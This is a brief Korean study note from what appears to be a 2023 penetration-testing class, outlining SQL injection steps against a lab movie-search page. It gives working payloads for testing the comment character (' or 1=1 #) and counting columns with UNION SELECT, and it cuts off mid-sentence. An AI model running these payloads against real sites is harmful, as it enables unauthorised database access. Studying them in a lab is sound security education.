23년 봄학기/모의해킹

중간정리

SQL injection GET/Search/Select 취약점 확인 Apostrophe 를 입력후 syntax error 유도 ex) ' " ; # -- 주석 문자 확인 ' or 1=1 -- 했더니 아무것도 안나오면 주석문자가 아니다 ' or 1=1 # 했더니 전체 영화정보가 출력되니 주석문자 찾음 컬럼 수 확인 ' union select 1,2,3,4,5,6# --> The used SELECT statements have a different number of columns ' union select 1,2,3,4,5# --> 다섯개일때 발견 데이터 베이스 이름 확인 테이블 이름 확인 화면에출력하는2,3,4,5번컬럼위치중에시스템변수또는시스템함수(예, database(), user(), system_..